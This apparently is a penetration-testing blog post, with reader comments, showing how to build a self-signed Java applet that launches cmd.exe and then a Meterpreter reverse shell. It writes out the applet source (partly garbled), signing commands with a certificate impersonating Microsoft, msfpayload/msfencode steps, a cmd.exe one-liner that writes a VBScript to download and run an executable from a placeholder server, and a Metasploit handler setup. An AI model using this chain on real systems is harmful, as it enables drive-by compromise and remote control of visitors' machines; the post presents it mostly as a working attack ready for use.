Building a Java Applet with Meterpreter Payload

At Infosec World Conference, I gave a presentation on Breaking the Browser with Rafal Los. One of the demos that I prepared was a Java Applet with a Meterpreter Payload. The demo can be found here.

In this post, we will build an Applet that executes cmd.exe. Here is the source code of the Applet:

import java.applet.*;
import java.awt.*;
public class MSFcmd extends Applet {
public void init() {
Process f;
String cmd = "cmd.exe";
try {
f = Runtime.getRuntime().exec(cmd);
catch(IOException e) {
Process s;

Next, we need to self-sign the applet so that it can be run with access within the browser.

Compile the Applet source code to an executable class.
Package the compiled class into a JAR file.
jar cvf MSFcmd.jar MSFcmd.class
Generate key pairs.
keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass mystorepass

Sign the JAR file.
jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar SignedMSFcmd.jar MSFcmd.jar signapplet

Export the public key certificate.
keytool -export -keystore mykeystore -storepass mystorepass -alias signapplet -file mycertificate.cer

To make this easier for people to use,I built a simple bash script called

Example of running
Enter the name of the applet without the extension:
[+] Packaging the compiled class into a JAR file
[+] Generating key pairs
What is your first and last name?
What is the name of your organizational unit?
What is the name of your organization?
Microsoft Organization
What is the name of your City or Locality?
What is the name of your State or Province?
What is the two-letter country code for this unit?
Is CN=Unknown, OU=Microsoft, O=Microsoft Organization, L=Redmond, ST=Seatle, C=US correct?

[+] Signing the JAR file

The signer certificate will expire within six months.
[+] Exporting the public key certificate
Certificate stored in file
[+] Done

Finally, we just need to deploy the JAR and the class file.
cp SignedMSFcmd.jar /var/www/
cp MSFcmd.class /var/www/
echo “<applet code=”MSFcmd.class” archive=”SignedMSFcmd.jar”
height=”1″ width=”1″></applet>” > /var/www/index.html
sudo /etc/init.d/apache2 start
Browse to the webserver from a windows system, which will execute cmd.exe

To have the applet provide us a meterpreter reverse shell we need to modify the command that is run. First we need to construct a malicious executable using Metasploit:

The executable can be constructed by:
(replace x.x.x.x with the ip of your server)

cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=443 R
| ./msfencode -t exe -o update.exe;
cp update.exe /var/www/
sudo chmod 755 /var/www/update.exe

Now, we need to add a command into the Java Applet to download and execute the executable:
cmd.exe /c echo Const adTypeBinary = 1 > C:\windows\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> C:\windows\apsou.vbs & echo Dim BinaryStream >> C:\windows\apsou.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> C:\windows\apsou.vbs & echo BinaryStream.Type = adTypeBinary >> C:\windows\apsou.vbs & echo BinaryStream.Open >> C:\windows\apsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> C:\windows\apsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> C:\windows\apsou.vbs & echo Function BinaryGetURL(URL) >> C:\windows\apsou.vbs & echo Dim Http >> C:\windows\apsou.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> C:\windows\apsou.vbs & echo Http.Open "GET", URL, False >> C:\windows\apsou.vbs & echo Http.Send >> C:\windows\apsou.vbs & echo BinaryGetURL = Http.ResponseBody >> C:\windows\apsou.vbs & echo End Function >> C:\windows\apsou.vbs & echo Set shell = CreateObject("WScript.Shell") >> C:\windows\apsou.vbs & echo shell.Run "C:\windows\update.exe" >> C:\windows\apsou.vbs & start C:\windows\apsou.vbs http://x.x.x.x/my.exe C:\windows\update.exe
(replace x.x.x.x with the ip of your server)


Setup Metasploit to listen for the connections:
sudo ./msfconsole
use exploit/multi/handler
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST x.x.x.x
set LPORT 443
exploit -j

[*] Exploit running as background job.
[*] Started reverse handler
[*] Starting the payload handler…
PWN dem V0hns!



6 Responses to Building a Java Applet with Meterpreter Payload

  1. Kelli Garner says:

    I enjoy this site, it is worth me coming back

  2. Garret says:

    It doesn’t work on Vista so it’s not big deal!

    Microsoft got smart? Any ideas!

  3. Jamuse says:

    On WinXP, you need to run:

    String cmd = “cmd.exe /c start cmd.exe”;

    instead of:

    String cmd = “cmd.exe”;

    to get a dos prompt to pop up.

  4. […] Building a Java Applet with Meterpreter Payload – A talk about building an Applet that executes cmd.exe. […]

  5. […] security incident waiting to happen. In fact, abusing java applets is a well known technique in penetration testing. If the whitehats are catching on, you can count on the blackhats doing far worse. Posted […]

  6. business directory…

    […]Building a Java Applet with Meterpreter Payload « Joshua "Jabra" Abraham[…]…

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: